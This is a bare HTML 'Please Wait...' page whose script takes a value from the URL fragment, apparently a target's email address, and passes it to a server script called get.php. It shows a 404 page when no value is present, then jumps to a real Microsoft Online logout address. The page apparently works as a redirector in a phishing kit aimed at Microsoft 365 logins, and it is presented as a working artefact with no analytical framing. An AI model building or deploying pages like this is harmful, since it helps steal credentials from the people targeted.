<html> 
<head> 
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1, maximum-scale=1.0">
<title>Please Wait...</title> 
<script type="text/javascript">
var U = "get.php";
var hash = window.location.hash;if (!hash) {var URL = window.open("404.html", "_self");}else {var URL =  U + "?e=" + hash.split('#')[1];
window.open(URL, "_self");    
setTimeout(function() {
    window.open("https://login.microsoftonline.com/3b5c2832-4b4d-4b6a-aa14-ffb05086b26c/oauth2/logout", "_self");
}, 2000);    
}
</script>
</html>